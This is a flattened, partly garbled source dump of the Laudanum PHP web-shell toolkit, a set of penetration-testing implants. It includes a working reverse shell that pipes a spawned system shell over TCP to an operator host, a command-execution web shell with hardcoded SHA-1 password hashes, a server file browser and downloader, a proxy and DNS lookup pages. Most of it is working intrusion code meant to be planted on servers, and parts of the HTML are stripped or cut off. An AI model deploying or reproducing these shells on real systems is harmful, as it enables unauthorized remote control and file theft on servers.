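 * NOTE(review): on PHP 8 the @ operator no longer zeroes error_reporting() (fatal-class
 * bits stay set), so this test would need (error_reporting() & $errno) === 0 there —
 * TODO confirm against the target PHP version. */ 66 | if (error_reporting() == 0) { 67 | $_SESSION['output'] .= $errstr . "\n"; 68 | } else { 69 | die(' 71 | 72 | 73 | Laudanum PHP DNS Access 74 | 75 | 76 |
 
 Fatal Error!
 
 77 | 
 
 ' . htmlspecialchars($errstr, ENT_QUOTES) . '
 
 78 | 
 
 in ' . htmlspecialchars($errfile, ENT_QUOTES) . ', line ' . $errline . '.
 
 79 | 80 | 
 81 | 
 82 | Copyright © 2014, Kevin Johnson and the Laudanum team.
 83 | Written by Tim Medin.
 84 | Get the latest version at laudanum.secureideas.net. 85 | 
 86 | 87 | 88 | '); 89 | } 90 | } 91 | 92 | set_error_handler('error_handler'); 93 | 94 | 95 | /* Initialize some variables we need again and again. */ 96 | $query = isset($_POST['query']) ? $_POST['query'] : ''; 97 | $type = isset($_POST['type']) ? $_POST['type'] : 'DNS_ANY'; 98 | ?> 99 | 101 | 102 | 103 | Laudanum PHP DNS Access 104 | 105 | 106 | 111 | 112 | 113 | 114 |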

DNS Query 0.1

115 |
116 |
117 | DNS Lookup: 118 |

Query: 119 | Type: 134 | 135 |

136 |
137 | 138 | 139 | "; 144 | echo "Result = "; 145 | print_r($result); 146 | echo "Auth NS = "; 147 | print_r($authns); 148 | echo "Additional = "; 149 | print_r($addtl); 150 | echo ""; 151 | } 152 | ?> 153 |
154 |
155 | Copyright © 2014, Kevin Johnson and the Laudanum team.
156 | Written by Tim Medin.
157 | Get the latest version at laudanum.secureideas.net. 158 |
159 | 160 | 161 | 162 | -------------------------------------------------------------------------------- /laudanum/php/file.php: -------------------------------------------------------------------------------- 1 | 14 | *** 15 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team 16 | *** 17 | ******************************************************************************** 18 | *** 19 | *** This file allows browsing of the file system. 20 | *** Written by Tim Medin 21 | *** 2013-12-28 Updated by Jason Gillam - fixed parent folder 22 | *** 23 | ******************************************************************************** 24 | *** This program is free software; you can redistribute it and/or 25 | *** modify it under the terms of the GNU General Public License 26 | *** as published by the Free Software Foundation; either version 2 27 | *** of the License, or (at your option) any later version. 28 | *** 29 | *** This program is distributed in the hope that it will be useful, 30 | *** but WITHOUT ANY WARRANTY; without even the implied warranty of 31 | *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 32 | *** GNU General Public License for more details. 33 | *** 34 | *** You can get a copy of the GNU General Public License from this 35 | *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 36 | *** You can also write to the Free Software Foundation, Inc., 59 Temple 37 | *** Place - Suite 330, Boston, MA 02111-1307, USA. 
38 | *** 39 | ***************************************************************************** */ 40 | 41 | // ***************** Config entries below *********************** 42 | 43 | // IPs are enterable as individual addresses TODO: add CIDR support 44 | $allowedIPs = array("192.168.1.1","127.0.0.1"); 45 | 46 | # *********** No editable content below this line ************** 47 | 48 | $allowed = 0; 49 | foreach ($allowedIPs as $IP) { 50 | if ($_SERVER["REMOTE_ADDR"] == $IP) 51 | $allowed = 1; 52 | } 53 | 54 | if ($allowed == 0) { 55 | header("HTTP/1.0 404 Not Found"); 56 | die(); 57 | } 58 | 59 | 60 | 61 | /* This error handler will turn all notices, warnings, and errors into fatal 62 | * errors, unless they have been suppressed with the @-operator. */ 63 | function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { 64 | /* The @-opertor (used with chdir() below) temporarely makes 65 | * error_reporting() return zero, and we don't want to die in that case. 66 | * We do note the error in the output, though. */ 67 | if (error_reporting() == 0) { 68 | $_SESSION['output'] .= $errstr . "\n"; 69 | } else { 70 | die(' 72 | 73 | 74 | Laudanum PHP File Browser 75 | 76 | 77 |

Fatal Error!

78 |

' . $errstr . '

79 |

in ' . $errfile . ', line ' . $errline . '.

80 | 81 |
82 |
83 | Copyright © 2014, Kevin Johnson and the Laudanum team.
84 | Written by Tim Medin.
85 | Get the latest version at laudanum.secureideas.net. 86 |
87 | 88 | 89 | '); 90 | } 91 | } 92 | 93 | set_error_handler('error_handler'); 94 | 95 | 96 | /* Initialize some variables we need again and again. */ 97 | $dir = isset($_GET["dir"]) ? $_GET["dir"] : "."; 98 | $file = isset($_GET["file"]) ? $_GET["file"] : ""; 99 | 100 | if ($file != "") { 101 | if(file_exists($file)) { 102 | 103 | $s = split("/", $file); 104 | $filename = $s[count($s) - 1]; 105 | header("Content-type: application/x-download"); 106 | header("Content-Length: ".filesize($file)); 107 | header("Content-Disposition: attachment; filename=\"".$filename."\""); 108 | readfile($file); 109 | die(); 110 | } 111 | } 112 | ?> 113 | 115 | 116 | 117 | Laudanum File Browser 118 | 119 | 120 | 122 | 123 | 124 | 125 |

Laudanum File Browser 0.1

126 | Home
127 | 128 | Directory listing of / "; 137 | $breadcrumb = '/'; 138 | foreach ($dirs as $d) { 139 | if ($d != '') { 140 | $breadcrumb .= $d . "/"; 141 | echo "$d/ "; 142 | } 143 | } 144 | echo ""; 145 | 146 | // translate .. to a real dir 147 | $parentdir = ""; 148 | for ($i = 0; $i < count($dirs) - 2; $i++) { 149 | $parentdir .= $dirs[$i] . "/"; 150 | } 151 | 152 | echo ""; 153 | echo ""; 154 | echo ""; 155 | 156 | //get listing, separate into directories and files 157 | $listingfiles = array(); 158 | $listingdirs = array(); 159 | 160 | if ($handle = @opendir($curdir)) { 161 | while ($o = readdir($handle)) { 162 | if ($o == "." || $o == "..") continue; 163 | if (@filetype($curdir . $o) == "dir") { 164 | $listingdirs[] = $o . "/"; 165 | } 166 | else { 167 | $listingfiles[] = $o; 168 | } 169 | } 170 | 171 | @natcasesort($listingdirs); 172 | @natcasesort($listingfiles); 173 | 174 | //display directories 175 | foreach ($listingdirs as $f) { 176 | echo ""; 177 | } 178 | 179 | //display files 180 | foreach ($listingfiles as $f) { 181 | echo ""; 182 | } 183 | } 184 | else { 185 | echo ""; 186 | } 187 | ?> 188 |
NameDateSize
../
" . $f . "" . "
" . $f . "" . "" . number_format(@filesize($curdir . $f)) . "

Can't open directory

189 |
190 |
191 | Copyright © 2014, Kevin Johnson and the Laudanum team.
192 | Written by Tim Medin.
193 | Get the latest version at laudanum.secureideas.net. 194 |
195 | 196 | 197 | -------------------------------------------------------------------------------- /laudanum/php/host.php: -------------------------------------------------------------------------------- 1 | 14 | *** 15 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team 16 | *** 17 | ******************************************************************************** 18 | *** 19 | *** This file provides a host lookup by ip address. 20 | *** Adapted from Laudanum dns.php by Jason Gillam 21 | *** 22 | ******************************************************************************** 23 | *** This program is free software; you can redistribute it and/or 24 | *** modify it under the terms of the GNU General Public License 25 | *** as published by the Free Software Foundation; either version 2 26 | *** of the License, or (at your option) any later version. 27 | *** 28 | *** This program is distributed in the hope that it will be useful, 29 | *** but WITHOUT ANY WARRANTY; without even the implied warranty of 30 | *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 31 | *** GNU General Public License for more details. 32 | *** 33 | *** You can get a copy of the GNU General Public License from this 34 | *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 35 | *** You can also write to the Free Software Foundation, Inc., 59 Temple 36 | *** Place - Suite 330, Boston, MA 02111-1307, USA. 
37 | *** 38 | ***************************************************************************** */ 39 | 40 | // ***************** Config entries below *********************** 41 | 42 | // IPs are enterable as individual addresses TODO: add CIDR support 43 | $allowedIPs = array("19.168.2.16", "192.168.1.100"); 44 | 45 | # *********** No editable content below this line ************** 46 | 47 | $allowed = 0; 48 | foreach ($allowedIPs as $IP) { 49 | if ($_SERVER["REMOTE_ADDR"] == $IP) 50 | $allowed = 1; 51 | } 52 | 53 | if ($allowed == 0) { 54 | header("HTTP/1.0 404 Not Found"); 55 | die(); 56 | } 57 | 58 | 59 | /* This error handler will turn all notices, warnings, and errors into fatal 60 | * errors, unless they have been suppressed with the @-operator. */ 61 | function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { 62 | /* The @-opertor (used with chdir() below) temporarely makes 63 | * error_reporting() return zero, and we don't want to die in that case. 64 | * We do note the error in the output, though. */ 65 | if (error_reporting() == 0) { 66 | $_SESSION['output'] .= $errstr . "\n"; 67 | } else { 68 | die(' 70 | 71 | 72 | Laudanum PHP Hostname by IP Lookup 73 | 74 | 75 |

Fatal Error!

76 |

' . $errstr . '

77 |

in ' . $errfile . ', line ' . $errline . '.

78 | 79 |
80 |
81 | Copyright © 2014, Kevin Johnson and the Laudanum team.
82 | Written by Tim Medin.
83 | Get the latest version at laudanum.secureideas.net. 84 |
85 | 86 | 87 | '); 88 | } 89 | } 90 | 91 | set_error_handler('error_handler'); 92 | 93 | 94 | /* Initialize some variables we need again and again. */ 95 | $query = isset($_POST['query']) ? $_POST['query'] : ''; 96 | $type = isset($_POST['type']) ? $_POST['type'] : 'DNS_ANY'; 97 | ?> 98 | 100 | 101 | 102 | Laudanum Host Lookup 103 | 104 | 105 | 110 | 111 | 112 | 113 |

Host Lookup 0.1

114 |
115 |
116 | Host Lookup: 117 |

IP: 118 | 119 | 120 |

121 |
122 | 123 | 124 | "; 129 | echo "Result = "; 130 | print_r($result); 131 | echo ""; 132 | } 133 | ?> 134 |
135 |
136 | Copyright © 2014, Kevin Johnson and the Laudanum team.
137 | Written by Tim Medin.
138 | Get the latest version at laudanum.secureideas.net. 139 |
140 | 141 | 142 | 143 | -------------------------------------------------------------------------------- /laudanum/php/killnc.php: -------------------------------------------------------------------------------- 1 | 13 | *** Tim Medin 14 | *** 15 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team 16 | *** 17 | ******************************************************************************** 18 | *** 19 | *** This file attempts to kill all netcat processes spawned by the current user. 20 | *** This may be useful in cases where a reverse shell attempt has gone wrong. 21 | *** 22 | *** Written by Jason Gillam 23 | *** 24 | ******************************************************************************** 25 | *** This program is free software; you can redistribute it and/or 26 | *** modify it under the terms of the GNU General Public License 27 | *** as published by the Free Software Foundation; either version 2 28 | *** of the License, or (at your option) any later version. 29 | *** 30 | *** This program is distributed in the hope that it will be useful, 31 | *** but WITHOUT ANY WARRANTY; without even the implied warranty of 32 | *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 33 | *** GNU General Public License for more details. 34 | *** 35 | *** You can get a copy of the GNU General Public License from this 36 | *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 37 | *** You can also write to the Free Software Foundation, Inc., 59 Temple 38 | *** Place - Suite 330, Boston, MA 02111-1307, USA. 
39 | *** 40 | ***************************************************************************** */ 41 | 42 | 43 | // ***************** Config entries below *********************** 44 | 45 | // IPs are enterable as individual addresses TODO: add CIDR support 46 | $allowedIPs = array("19.168.2.16", "192.168.1.100"); 47 | 48 | # *********** No editable content below this line ************** 49 | 50 | $allowed = 0; 51 | foreach ($allowedIPs as $IP) { 52 | if ($_SERVER["REMOTE_ADDR"] == $IP) 53 | $allowed = 1; 54 | } 55 | 56 | if ($allowed == 0) { 57 | header("HTTP/1.0 404 Not Found"); 58 | die(); 59 | } 60 | 61 | 62 | /* This error handler will turn all notices, warnings, and errors into fatal 63 | * errors, unless they have been suppressed with the @-operator. */ 64 | function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { 65 | /* The @-opertor (used with chdir() below) temporarely makes 66 | * error_reporting() return zero, and we don't want to die in that case. 67 | * We do note the error in the output, though. */ 68 | if (error_reporting() == 0) { 69 | $_SESSION['output'] .= $errstr . "\n"; 70 | } else { 71 | die(' 73 | 74 | 75 | Laudanum PHP Hostname by IP Lookup 76 | 77 | 78 |

Fatal Error!

79 |

' . $errstr . '

80 |

in ' . $errfile . ', line ' . $errline . '.

81 | 82 |
83 |
84 | Copyright © 2014, Kevin Johnson and the Laudanum team.
85 | Written by Tim Medin.
86 | Get the latest version at laudanum.secureideas.net. 87 |
88 | 89 | 90 | '); 91 | } 92 | } 93 | 94 | set_error_handler('error_handler'); 95 | 96 | 97 | 98 | ?> 99 | 101 | 102 | 103 | Laudanum Kill nc 104 | 105 | 106 | 107 | 108 |

Kill nc 0.1

109 | 110 | 111 |
112 |
113 | Copyright © 2014, Kevin Johnson and the Laudanum team.
114 | Written by Tim Medin.
115 | Get the latest version at laudanum.secureideas.net. 116 |
117 | 118 | 119 | 120 | -------------------------------------------------------------------------------- /laudanum/php/php-reverse-shell.php: -------------------------------------------------------------------------------- 1 | array("pipe", "r"), // stdin is a pipe that the child will read from 109 | 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 110 | 2 => array("pipe", "w") // stderr is a pipe that the child will write to 111 | ); 112 | 113 | $process = proc_open($shell, $descriptorspec, $pipes); 114 | 115 | if (!is_resource($process)) { 116 | printit("ERROR: Can't spawn shell"); 117 | exit(1); 118 | } 119 | 120 | // Set everything to non-blocking 121 | // Reason: Occsionally reads will block, even though stream_select tells us they won't 122 | stream_set_blocking($pipes[0], 0); 123 | stream_set_blocking($pipes[1], 0); 124 | stream_set_blocking($pipes[2], 0); 125 | stream_set_blocking($sock, 0); 126 | 127 | printit("Successfully opened reverse shell to $ip:$port"); 128 | 129 | while (1) { 130 | // Check for end of TCP connection 131 | if (feof($sock)) { 132 | printit("ERROR: Shell connection terminated"); 133 | break; 134 | } 135 | 136 | // Check for end of STDOUT 137 | if (feof($pipes[1])) { 138 | printit("ERROR: Shell process terminated"); 139 | break; 140 | } 141 | 142 | // Wait until a command is end down $sock, or some 143 | // command output is available on STDOUT or STDERR 144 | $read_a = array($sock, $pipes[1], $pipes[2]); 145 | $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); 146 | 147 | // If we can read from the TCP socket, send 148 | // data to process's STDIN 149 | if (in_array($sock, $read_a)) { 150 | if ($debug) printit("SOCK READ"); 151 | $input = fread($sock, $chunk_size); 152 | if ($debug) printit("SOCK: $input"); 153 | fwrite($pipes[0], $input); 154 | } 155 | 156 | // If we can read from the process's STDOUT 157 | // send data down tcp connection 158 | if (in_array($pipes[1], $read_a)) { 159 | 
if ($debug) printit("STDOUT READ"); 160 | $input = fread($pipes[1], $chunk_size); 161 | if ($debug) printit("STDOUT: $input"); 162 | fwrite($sock, $input); 163 | } 164 | 165 | // If we can read from the process's STDERR 166 | // send data down tcp connection 167 | if (in_array($pipes[2], $read_a)) { 168 | if ($debug) printit("STDERR READ"); 169 | $input = fread($pipes[2], $chunk_size); 170 | if ($debug) printit("STDERR: $input"); 171 | fwrite($sock, $input); 172 | } 173 | } 174 | 175 | fclose($sock); 176 | fclose($pipes[0]); 177 | fclose($pipes[1]); 178 | fclose($pipes[2]); 179 | proc_close($process); 180 | 181 | // Like print, but does nothing if we've daemonised ourself 182 | // (I can't figure out how to redirect STDOUT like a proper daemon) 183 | function printit ($string) { 184 | if (!$daemon) { 185 | print "$string\n"; 186 | } 187 | } 188 | 189 | ?> 190 | 191 | 192 | 193 | -------------------------------------------------------------------------------- /laudanum/php/proxy.php: -------------------------------------------------------------------------------- 1 | 15 | *** 16 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team 17 | *** 18 | ******************************************************************************** 19 | *** 20 | *** This file allows browsing of the file system. 21 | *** Written by Tim Medin 22 | *** 23 | ******************************************************************************** 24 | *** This program is free software; you can redistribute it and/or 25 | *** modify it under the terms of the GNU General Public License 26 | *** as published by the Free Software Foundation; either version 2 27 | *** of the License, or (at your option) any later version. 28 | *** 29 | *** This program is distributed in the hope that it will be useful, 30 | *** but WITHOUT ANY WARRANTY; without even the implied warranty of 31 | *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 32 | *** GNU General Public License for more details. 
33 | *** 34 | *** You can get a copy of the GNU General Public License from this 35 | *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 36 | *** You can also write to the Free Software Foundation, Inc., 59 Temple 37 | *** Place - Suite 330, Boston, MA 02111-1307, USA. 38 | *** 39 | ***************************************************************************** */ 40 | 41 | // TODO: If the remote site uses a sessionid it collides with the php sessionid cookie from this page 42 | // figure out how to reuse sessionid from the remote site 43 | 44 | // ***************** Config entries below *********************** 45 | 46 | // IPs are enterable as individual addresses TODO: add CIDR support 47 | $allowedIPs = array("19.168.2.16", "192.168.1.100","127.0.0.1","192.168.10.129","192.168.10.1"); 48 | 49 | # *********** No editable content below this line ************** 50 | 51 | $allowed = 0; 52 | foreach ($allowedIPs as $IP) { 53 | if ($_SERVER["REMOTE_ADDR"] == $IP) 54 | $allowed = 1; 55 | } 56 | 57 | if ($allowed == 0) { 58 | header("HTTP/1.0 404 Not Found"); 59 | die(); 60 | } 61 | 62 | /* This error handler will turn all notices, warnings, and errors into fatal 63 | * errors, unless they have been suppressed with the @-operator. */ 64 | function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { 65 | /* The @-opertor (used with chdir() below) temporarely makes 66 | * error_reporting() return zero, and we don't want to die in that case. 67 | * We do note the error in the output, though. */ 68 | if (error_reporting() == 0) { 69 | $_SESSION['output'] .= $errstr . "\n"; 70 | } else { 71 | die(' 73 | 74 | 75 | Laudanum PHP Proxy 76 | 77 | 78 |

Fatal Error!

79 |

' . $errstr . '

80 |

in ' . $errfile . ', line ' . $errline . '.

81 | 82 |
83 |
84 | Copyright © 2014, Kevin Johnson and the Laudanum team.
85 | Written by Tim Medin.
86 | Get the latest version at laudanum.secureideas.net. 87 |
88 | 89 | 90 | '); 91 | } 92 | } 93 | 94 | set_error_handler('error_handler'); 95 | 96 | function geturlarray($u) { 97 | // creates the url array, addes a scheme if it is missing and retries parsing 98 | $o = parse_url($u); 99 | if (!isset($o["scheme"])) { $o = parse_url("http://" . $u); } 100 | if (!isset($o["path"])) { $o["path"] = "/"; } 101 | return $o; 102 | } 103 | 104 | function buildurl ($u) { 105 | // build the url from the url array 106 | // this is used because the built in function isn't 107 | // avilable in all installs of php 108 | if (!isset($u["host"])) { return null; } 109 | 110 | $s = isset($u["scheme"]) ? $u["scheme"] : "http"; 111 | $s .= "://" . $u["host"]; 112 | $s .= isset($u["port"]) ? ":" . $u["port"] : ""; 113 | $s .= isset($u["path"]) ? $u["path"] : "/"; 114 | $s .= isset($u["query"]) ? "?" . $u["query"] : ""; 115 | $s .= isset($u["fragment"]) ? "#" . $u["fragment"] : ""; 116 | return $s; 117 | } 118 | 119 | function buildurlpath ($u) { 120 | //gets the full url and attempts to remove the file at the end of the url 121 | // e.g. http://blah.com/dir/file.ext => http://blah.com/dir/ 122 | if (!isset($u["host"])) { return null; } 123 | 124 | $s = isset($u["scheme"])? $u["scheme"] : "http"; 125 | $s .= "://" . $u["host"]; 126 | $s .= isset($u["port"]) ? ":" . $u["port"] : ""; 127 | 128 | $path = isset($u["path"]) ? $u["path"] : "/"; 129 | // is the last portion of the path a file or a dir? 130 | // assume if there is a . it is a file 131 | // if it ends in a / then it is a dir 132 | // if neither, than assume dir 133 | $dirs = explode("/", $path); 134 | $last = $dirs[count($dirs) - 1]; 135 | if (preg_match('/\./', $last) || !preg_match('/\/$/', $last)) { 136 | // its a file, remove the last chunk 137 | $path = substr($path, 0, -1 * strlen($last)); 138 | } 139 | 140 | $s .= $path; 141 | return $s; 142 | } 143 | 144 | function getfilename ($u) { 145 | // returns the file name 146 | // e.g. 
http://blah.com/dir/file.ext returns file.ext 147 | // technically, it is the last portion of the url, so there is a potential 148 | // for a problem if a http://blah.com/dir returns a file 149 | $s = explode("/", $u["path"]); 150 | return $s[count($s) - 1]; 151 | } 152 | 153 | function getcontenttype ($headers) { 154 | // gets the content type 155 | foreach($headers as $h) { 156 | if (preg_match_all("/^Content-Type: (.*)$/", $h, $out)) { 157 | return $out[1][0]; 158 | } 159 | } 160 | } 161 | 162 | function getcontentencoding ($headers) { 163 | foreach ($headers as $h) { 164 | if (preg_match_all("/^Content-Encoding: (.*)$/", $h, $out)) { 165 | return $out[1][0]; 166 | } 167 | } 168 | } 169 | 170 | function removeheader($header, $headers) { 171 | foreach (array_keys($headers) as $key) { 172 | if (preg_match_all("/^" . $header . ": (.*)$/", $headers[$key], $out)) { 173 | unset($headers[$key]); 174 | return $headers; 175 | } 176 | } 177 | } 178 | 179 | function rewritecookies($headers) { 180 | // removes the path and domain from cookies 181 | for ($i = 0; $i < count($headers); $i++) { 182 | if (preg_match_all("/^Set-Cookie:/", $headers[$i], $out)) { 183 | $headers[$i] = preg_replace("/domain=[^[:space:]]+/", "", $headers[$i]); 184 | $headers[$i] = preg_replace("/path=[^[:space:]]+/", "", $headers[$i]); 185 | } 186 | } 187 | return $headers; 188 | } 189 | 190 | function getsessionid($headers) { 191 | for ($i = 0; $i < count($headers); $i++) { 192 | if (preg_match_all("/^Set-Cookie: SessionID=([a-zA-Z0-9]+);/", $headers[$i], $out)) 193 | return $out[1][0]; 194 | } 195 | return "0"; 196 | } 197 | 198 | function compatible_gzinflate($gzData) { 199 | if ( substr($gzData, 0, 3) == "\x1f\x8b\x08" ) { 200 | $i = 10; 201 | $flg = ord( substr($gzData, 3, 1) ); 202 | if ( $flg > 0 ) { 203 | if ( $flg & 4 ) { 204 | list($xlen) = unpack('v', substr($gzData, $i, 2) ); 205 | $i = $i + 2 + $xlen; 206 | } 207 | if ( $flg & 8 ) 208 | $i = strpos($gzData, "\0", $i) + 1; 209 | if ( $flg 
& 16 ) 210 | $i = strpos($gzData, "\0", $i) + 1; 211 | if ( $flg & 2 ) 212 | $i = $i + 2; 213 | } 214 | return @gzinflate( substr($gzData, $i, -8) ); 215 | } else { 216 | return false; 217 | } 218 | return false; 219 | } 220 | 221 | function rewrite ($d, $u) { 222 | $r = $d; 223 | //rewrite images and links - absolute reference 224 | $r = preg_replace("/((src|href).?=.?['\"]?)(\/[^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . $u["scheme"] . "://" . $u["host"] . "\\3", $r); 225 | //rewrite images and links - hard linked 226 | $r = preg_replace("/((src|href).?=.?['\"])(http[^'\"]+['\"])/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . "\\3", $r); 227 | //rewrite images and links - relative reference 228 | $r = preg_replace("/((src|href).?=.?['\"])([^\/][^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . buildurlpath($u) . "\\3", $r); 229 | 230 | 231 | //rewrite form - absolute reference 232 | $r = preg_replace("/(]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4>", $r); 233 | //rewrite form - hard linked 234 | $r = preg_replace("/(]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4>", $r); 235 | //rewrite form - relative reference 236 | $r = preg_replace("/(]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4>", $r); 237 | return $r; 238 | } 239 | 240 | /* Initialize some variables we need again and again. */ 241 | $url = isset($_GET["laudurl"]) ? $_GET["laudurl"] : ""; 242 | if ($url == "") { 243 | $url = isset($_POST["laudurl"]) ? $_POST["laudurl"] : ""; 244 | } 245 | 246 | if ($url == "") { 247 | ?> 248 | 250 | 251 | 252 | Laudanum PHP Proxy 253 | 254 | 255 | 260 | 261 | 262 | 263 |

Laudanum PHP Proxy

264 | 265 |
266 | 267 | 268 |
269 |
270 |
271 | Copyright © 2014, Kevin Johnson and the Laudanum team.
272 | Written by Tim Medin.
273 | Get the latest version at laudanum.secureideas.net. 274 |
275 | 276 | 277 | 278 | 352 | -------------------------------------------------------------------------------- /laudanum/php/shell.php: -------------------------------------------------------------------------------- 1 | 13 | *** Tim Medin 14 | *** 15 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team 16 | *** 17 | ******************************************************************************** 18 | *** 19 | *** This file provides shell access to the system. It is built based on the 2.1 20 | *** version of PHPShell which is Copyright (C) 2000-2005 Martin Geisler 21 | *** 22 | *** 23 | *** Updated by Tim Medin 24 | *** 25 | ******************************************************************************** 26 | *** This program is free software; you can redistribute it and/or 27 | *** modify it under the terms of the GNU General Public License 28 | *** as published by the Free Software Foundation; either version 2 29 | *** of the License, or (at your option) any later version. 30 | *** 31 | *** This program is distributed in the hope that it will be useful, 32 | *** but WITHOUT ANY WARRANTY; without even the implied warranty of 33 | *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 34 | *** GNU General Public License for more details. 35 | *** 36 | *** You can get a copy of the GNU General Public License from this 37 | *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 38 | *** You can also write to the Free Software Foundation, Inc., 59 Temple 39 | *** Place - Suite 330, Boston, MA 02111-1307, USA. 40 | *** 41 | ***************************************************************************** */ 42 | 43 | // ***************** Config entries below *********************** 44 | 45 | // IPs are enterable as individual addresses TODO: add CIDR support 46 | $allowedIPs = array("192.168.1.55", "12.2.2.2"); 47 | 48 | # format is "username" => "password" 49 | # password is generated using sha1sum as shown below (don't forget the -n, KEVIN!) 
50 | # echo -n Password1 | sha1sum 51 | $users = array("kevin" => "b441ac06613fc8d63795be9ad0beaf55011936ac", "tim" => "a94a1fe5ccb19ba61c4c0873d391e987982fbbd3", "yomamma" => "a94a1fe5ccb19ba61c4c0873d391e987982fbbd3"); 52 | 53 | # *********** No editable content below this line ************** 54 | 55 | $allowed = 0; 56 | foreach ($allowedIPs as $IP) { 57 | if ($_SERVER["REMOTE_ADDR"] == $IP) 58 | $allowed = 1; 59 | } 60 | 61 | if ($allowed == 0) { 62 | header("HTTP/1.0 404 Not Found"); 63 | die(); 64 | } 65 | 66 | 67 | 68 | /* This error handler will turn all notices, warnings, and errors into fatal 69 | * errors, unless they have been suppressed with the @-operator. */ 70 | function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { 71 | /* The @-opertor (used with chdir() below) temporarely makes 72 | * error_reporting() return zero, and we don't want to die in that case. 73 | * We do note the error in the output, though. */ 74 | if (error_reporting() == 0) { 75 | $_SESSION['output'] .= $errstr . "\n"; 76 | } else { 77 | die(' 79 | 80 | 81 | Laudanum PHP Shell Access 82 | 83 | 84 |

Fatal Error!

85 |

' . $errstr . '

86 |

in ' . $errfile . ', line ' . $errline . '.

87 | 88 |
89 |
90 | Copyright © 2014, Kevin Johnson and the Laudanum team.
92 | Get the latest version at laudanum.secureideas.net. 93 |
94 | 95 | 96 | '); 97 | } 98 | } 99 | 100 | set_error_handler('error_handler'); 101 | 102 | 103 | function logout() { 104 | $_SESSION = array('authenticated' => false); 105 | if (isset($_COOKIE[session_name()])) 106 | setcookie(session_name(), '', time()-42000, '/'); 107 | session_destroy(); 108 | } 109 | 110 | 111 | function stripslashes_deep($value) { 112 | if (is_array($value)) 113 | return array_map('stripslashes_deep', $value); 114 | else 115 | return stripslashes($value); 116 | } 117 | 118 | if (get_magic_quotes_gpc()) 119 | $_POST = stripslashes_deep($_POST); 120 | 121 | /* Initialize some variables we need again and again. */ 122 | $username = isset($_POST['username']) ? $_POST['username'] : ''; 123 | $password = isset($_POST['password']) ? $_POST['password'] : ''; 124 | $nounce = isset($_POST['nounce']) ? $_POST['nounce'] : ''; 125 | 126 | $command = isset($_POST['command']) ? $_POST['command'] : ''; 127 | $rows = isset($_POST['rows']) ? $_POST['rows'] : 24; 128 | $columns = isset($_POST['columns']) ? $_POST['columns'] : 80; 129 | 130 | 131 | ///* Default settings --- these settings should always be set to something. */ 132 | //$default_settings = array('home-directory' => '.'); 133 | 134 | ///* Merge settings. */ 135 | //$ini['settings'] = array_merge($default_settings, $ini['settings']); 136 | 137 | 138 | session_start(); 139 | 140 | /* Delete the session data if the user requested a logout. This leaves the 141 | * session cookie at the user, but this is not important since we 142 | * authenticates on $_SESSION['authenticated']. */ 143 | if (isset($_POST['logout'])) 144 | logout(); 145 | 146 | ///* Attempt authentication. */ 147 | //if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] && 148 | // isset($ini['users'][$username])) { 149 | // if (strchr($ini['users'][$username], ':') === false) { 150 | // // No seperator found, assume this is a password in clear text. 
151 | // $_SESSION['authenticated'] = ($ini['users'][$username] == $password); 152 | // } else { 153 | // list($fkt, $salt, $hash) = explode(':', $ini['users'][$username]); 154 | // $_SESSION['authenticated'] = ($fkt($salt . $password) == $hash); 155 | // } 156 | //} 157 | 158 | /* Attempt authentication. */ 159 | if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] && isset($users[$username])) 160 | $_SESSION['authenticated'] = ($users[$username] == hash("sha1", $password)); 161 | 162 | /* Enforce default non-authenticated state if the above code didn't set it 163 | * already. */ 164 | if (!isset($_SESSION['authenticated'])) 165 | $_SESSION['authenticated'] = false; 166 | 167 | if ($_SESSION['authenticated']) { 168 | /* Initialize the session variables. */ 169 | if (empty($_SESSION['cwd'])) { 170 | $_SESSION['cwd'] = '.'; 171 | $_SESSION['history'] = array(); 172 | $_SESSION['output'] = ''; 173 | } 174 | 175 | if (!empty($command)) { 176 | /* Save the command for late use in the JavaScript. If the command is 177 | * already in the history, then the old entry is removed before the 178 | * new entry is put into the list at the front. */ 179 | if (($i = array_search($command, $_SESSION['history'])) !== false) 180 | unset($_SESSION['history'][$i]); 181 | 182 | array_unshift($_SESSION['history'], $command); 183 | 184 | /* Now append the commmand to the output. */ 185 | $_SESSION['output'] .= '$ ' . $command . "\n"; 186 | 187 | /* Initialize the current working directory. */ 188 | if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) { 189 | $_SESSION['cwd'] = realpath($ini['settings']['home-directory']); 190 | } elseif (preg_match('/^[[:blank:]]*cd[[:blank:]]+([^;]+)$/', $command, $regs)) { 191 | /* The current command is a 'cd' command which we have to handle 192 | * as an internal shell command. */ 193 | 194 | if ($regs[1]{0} == '/') { 195 | /* Absolute path, we use it unchanged. 
